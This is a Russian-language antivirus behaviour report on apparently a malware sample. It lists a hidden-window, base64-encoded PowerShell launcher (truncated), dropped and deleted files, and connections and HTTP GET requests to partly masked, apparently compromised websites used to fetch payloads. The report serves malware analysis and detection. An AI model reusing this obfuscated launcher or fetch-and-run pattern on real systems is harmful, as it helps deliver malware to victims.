Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABWAGMAcgB5AHkANwBwAD0AKAAnAFcAdQAnACsAKAAnAHEAJwArACcANwA1ACcAKQArACcAbABpACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAGUAbgBWADoAVQBTAEUAcgBQAHIAbwBmAGkAbABFAFwAagBvAF...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1996
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\991947.cvr
- %HOMEPATH%\jox49_e\xa1ugaz\suxkgk93.exe
Удаляет следующие файлы
- %HOMEPATH%\jox49_e\xa1ugaz\suxkgk93.exe
Сетевая активность
Подключается к
- 't-##ivat.de':80
- 'zo######hootphotography.com':80
- 'ou###phase.de':80
- 'od##ille.de':443
- 'to####eakhouse.com':80
- 'to####eakhouse.com':443
- 'th#####tiveronin.com':80
- 'ol####kremer.net':80
TCP
Запросы HTTP GET
- http://t-##ivat.de/cgi-bin/FQzGOWY/
- http://zo######hootphotography.com/wp-includes/file/WZyzalVlzJWc/
- http://ou###phase.de/Uploads/J1tov1276668/
- http://to####eakhouse.com/wp-includes/LbZjD/
- http://th#####tiveronin.com/wp/file/uzXiZSaTCSa/
- http://www.th#####tiveronin.com/wp/file/uzXiZSaTCSa/
- http://ol####kremer.net/cgi-bin/file/mZpCq/
Другие
- 'od##ille.de':443
- 'to####eakhouse.com':443
UDP
- DNS ASK t-##ivat.de
- DNS ASK zo######hootphotography.com
- DNS ASK ou###phase.de
- DNS ASK od##ille.de
- DNS ASK to####eakhouse.com
- DNS ASK th#####tiveronin.com
- DNS ASK ol####kremer.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABWAGMAcgB5AHkANwBwAD0AKAAnAFcAdQAnACsAKAAnAHEAJwArACcANwA1ACcAKQArACcAbABpACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAGUAbgBWADoAVQBTAEUAcgBQAHIAbwBmAGkAbABFAFwAagBvAF...' (со скрытым окном)
